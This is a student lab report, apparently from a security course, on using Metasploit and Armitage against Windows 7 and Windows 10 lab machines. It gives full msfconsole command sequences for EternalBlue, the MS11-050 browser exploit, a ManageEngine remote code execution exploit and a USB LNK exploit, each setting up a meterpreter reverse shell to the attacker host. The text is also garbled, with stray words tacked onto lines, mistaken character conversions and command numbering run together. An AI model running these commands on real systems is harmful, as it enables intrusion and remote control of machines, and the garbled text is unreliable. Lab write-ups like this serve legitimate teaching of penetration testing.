20164305 徐廣皓 Exp5 MSF基礎應用

  • 1、知識點總結
  • 2、攻擊實例
    • 主動攻擊的實踐
      • ms08_067(win7)
        • payload/generic/shell_reverse_tcp(失敗)
        • payload/windows/meterpreter/reverse_tcp(失敗)
      • ms17_010_eternalblue(win7)
        • payload/windows/x64/meterpreter/reverse_tcp(成功)
    • 攻擊瀏覽器的實踐
        • ms11_050(win7)(成功)
      ms14_064(win7)  
        • exploit/windows/browser/ms14_064_ole_code_execution (失敗)
    • 攻擊客戶端的實踐
      • ManageEngine Applications Manager 13.5遠程代碼執行漏洞 (CVE-2018-7890)
        • manageengine_appmanager_exec (成功且惟一)
    • 成功應用任何一個輔助模塊
      • usb fileforma (成功)
  • 3、實驗總結
1、知識點總結

1.MSF攻擊方法

  • 主動攻擊:掃描主機漏洞,進行攻擊
  • 攻擊瀏覽器
  • 攻擊其餘客戶端

2.MSF的六種模塊

  • 滲透攻擊模塊Exploit Modules:攻擊漏洞,把shellcode"背"過去

    • 主動滲透攻擊:攻擊某個系統服務
    • 被動滲透攻擊:攻擊某個客戶端應用
  • 輔助模塊Auxiliary Modules:在進行滲透攻擊以前獲得目標系統豐富的情報信息,它是攻擊的前提攻擊載荷Payload Modules:載荷,一段指令(shellcode),目標系統在被滲透攻擊以後去執行的代碼

    • 網絡服務的掃描與查點
    • 探查敏感信息泄露、Fuzz測試發掘漏洞
    • 收集登陸密碼
  • 空字段模塊Nop Modules

    • 一些對程序運行狀態不會形成任何實質影響的空操做或無關操做指令,即空指令(滑行區)
    • 因爲系統沒法精確計算shellcode的起始地址,因此加入nops以增長攻擊成功的機率
  • 編碼模塊Encoders後滲透攻擊模塊Post:攻擊成功以後,動態傳輸代碼使其在被控機執行

    • 改變payload形狀,使得不出現特定字符
    • 確保攻擊載荷中不會出現滲透攻擊過程當中應加以免的「壞字符」
  • 查看六種模塊源碼目錄/usr/share/metasploit-framework/modules

3.MSF的三種用戶操做界面

 

  • msfconsole

    • 查看模塊的具體信息info [exploits|auxiliary|post|payloads|encoders|nops]
    • 查看設置信息show [options]
    • 查看攻擊目標類型show [target]
    • 查找命令search
      • 查找2016年產生的在windows平臺下的漏洞search ms16 type:exploit platform:windows
  • armitagewebgui

    • 啓動服務器service postgresql start

    • 啓動armitagearmitage

2、攻擊實例

沒實現ms08_067

靶機:Microsoft Windows 7

payload : generic/shell_reverse_tcp

實驗步驟

經過菜單欄圖標直接打開Armitag
html

根據已知信息推導出目標主機所在網段的IP,掃描目標網段完整信息,確認目標網絡拓撲結構以實施網絡偵查。依次選擇Hosts->Nmap Scan->Quick Scan(OS detect)web

 

虛擬機所在網段位192.168.80.0/24sql

 

Win10虛擬機IP信息shell

 

掃描後獲得網段中4個虛擬機包括主機windows

 

選中靶機192.168.80.137,右鍵選擇Services,查看靶機上開啓的服務:api

 

選中靶機192.168.80.137,右鍵選擇ScanArmitage會調用Metasploit的漏洞掃描模塊,定向掃描靶機,尋找存在的漏洞,爲下一步肯定攻擊方法提供參考依據瀏覽器

 

可見相似前幾回實驗在Metasploit中手動配置主機號、端口號等設置如今通通直接自動化了!服務器

利用上一步中漏洞掃描獲得的漏洞信息,自動搜索Metasploit攻擊模塊庫,尋找合適的攻擊模塊。選中靶機192.168.80.137,依次選擇菜單欄Attacks->Find AttacksArmitage會開始自動搜索尋找合適的攻擊模塊:網絡

 

在利用Armitage完成對靶機的攻擊模塊自動化搜索之後,選中192.168.80.137機右鍵能夠發現多了Attack菜單。依次選擇Attack->smb->ms08_067_netapi菜單,選擇smb漏洞下的ms08_067漏洞對WIN7靶機進行攻擊(也能夠在Armitage左側樹型目錄下依次選擇exploit->windows->smb->ms08_067_netapi找到該漏洞):app

 

launch一下,不行!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

爲啥???而後我去看了一下適用系統,沒有win7我哭了,我以前在作啥子?

 

 實現MS17_010_eternalblue

靶機:Microsoft Windows 7

payload :windows/meterpreter/reverse_tcp

實驗步驟

 依然鐵頭娃,此次手動配置(確定是能成功的)

 1 use auxiliary/scanner/smb/smb_ms17_010  2 set RHOST 192.168.80.141
 3 Run  4 Back  5 search ms17_010  6 use exploit/windows/smb/ms17_010_eternalblue  7 set RHOST 192.168.80.141
 8 show options  9 set payload windows/meterpreter/reverse_tcp 10 set LHOST 192.168.80.130
11 run

實現ms11_050

靶機:Microsoft Windows 7 + IE8

payload : windows/meterpreter/reverse_tcp

實驗步驟

1 search ms11_050 2 use exploit/windows/browser/ms11_050_mshtml_cobjectelement 3 set srvhost 192.168.80.130
4 set payload windows/meterpreter/reverse_tcp 5 set LHOST 192.168.80.130
6 show targets 7 set target 4
8 Run 9 http://192.168.80.130:8080/zrCOkaFC

實現CVE-2018-7890

靶機:Windows 10

實現這一攻擊須要ManageEngine Applications Manager 13.5,網上有相關警報書

網絡上通用版本爲13.5(試用版30天),實際上不怎麼好用。。。只須要啓動驗證服務,但也不是每次都能成功地 (我也試了半天才成功,成功以後電腦藍屏我還沒快照 o(╥﹏╥)o)

1 use exploit/windows/http/manageengine_appmanager_exec 2 show options 3 set RHOST 192.168.80.136
4 Set RPORT 6305
5 set LHOST 192.168.80.130
6 set payload windows/meterpreter/reverse_tcp 7 exploit

雖然顯示的是13版本,但安裝的時候顯示的13.5安裝.......我也不知道怎麼回事可能不顯示以後的版本號吧

 

實現CVE-2017-8464

攻擊靶機:Win7

1 use exploit/windows/fileformat/cve_2017_8464_lnk_rce 2 set payload windows/meterpreter/reverse_tcp 3 set LHOST 192.168.80.130 4 exploit 5 cp -r /root/.msf4/local/ /media/root/KINGSTON 6 use multi/handler 7 set paylaod windows/meterpreter/reverse_tcp 8 set LHOST 192.168.80.130 9 Exploit

這裏要注意系統要開啓U盤自動播放,若是沒開啓雙擊第一個文件就行

實驗感想

作攻擊以前,要看看攻擊對當前版本是否可行,避免出現鐵頭娃現象。對於不一樣的攻擊,可能有一次不行以後就成功的現象,要屢次嘗試分析其中的緣由才能進行判斷。因爲個人實驗中基本使用win7和win10,因此大部分早起漏洞都修補了,找新漏洞就有些困難,尤爲是win10找了半天才試出來一個,幸虧那個漏洞軟件公司沒有修補,要再也不找一個惟一還會花很長時間。

相關文章
相關標籤/搜索